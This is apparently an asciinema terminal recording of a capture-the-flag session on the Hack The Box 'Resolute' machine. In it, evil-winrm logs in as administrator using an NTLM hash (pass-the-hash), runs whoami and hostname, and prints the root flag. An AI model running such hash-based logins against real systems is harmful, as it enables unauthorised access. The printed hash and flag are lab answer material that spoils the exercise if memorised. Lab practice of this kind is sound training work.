{"version": 2, "width": 150, "height": 34, "timestamp": 1590844391, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.174982, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[0.176906, "o", "\u001bk/home/prashant\u001b\\"]
[0.187494, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[0.187906, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.708292, "o", "asciinema rec"]
[0.842808, "o", "\u001b[13Devil-winrm -i resolute.htb -u administrator -H fb3b106896cdaa8a08072775fbd9afe9"]
[1.290131, "o", "\u001b[?1l\u001b>"]
[1.290489, "o", "\u001b[?2004l\r\r\n"]
[1.291309, "o", "\u001bkevil-winrm\u001b\\"]
[2.393231, "o", "\r\n\u001b[0;34mEvil-WinRM shell v2.3\u001b[0m\r\n\r\n"]
[2.393938, "o", "\u001b[0;34mInfo: Establishing connection to remote endpoint\u001b[0m\r\n\r\n"]
[7.070221, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[7.84247, "o", "w"]
[8.002275, "o", "h"]
[8.346512, "o", "o"]
[8.586566, "o", "a"]
[9.026685, "o", "m"]
[9.330288, "o", "i"]
[9.962585, "o", ";"]
[10.35442, "o", "h"]
[10.602523, "o", "o"]
[11.034217, "o", "s"]
[11.18644, "o", "t"]
[11.618567, "o", "n"]
[11.834648, "o", "a"]
[11.994597, "o", "m"]
[12.202499, "o", "e"]
[12.45868, "o", "\r\n"]
[13.227043, "o", "megabank\\administrator\r\n"]
[13.228072, "o", "Resolute\r\n"]
[14.948222, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[15.314502, "o", "cat ../Desktop/root.txt"]
[15.458611, "o", "\r\n"]
[16.255281, "o", "e1d94876a506850d0c20edb5405e619c\r\n"]
[18.102125, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[19.309367, "o", "\u001b[0;31mError: An error of type NoMethodError happened, message is undefined method `start_with?' for nil:NilClass\u001b[0m\r\n\r\n\u001b[0;31mError: Exiting with code 1\u001b[0m\r\n\r\n"]
[19.31688, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[19.317772, "o", "\u001bk/home/prashant\u001b\\"]
[19.330507, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[19.330808, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[19.642795, "o", "\u001b[?2004l"]
[19.645679, "o", "\r\r\n"]
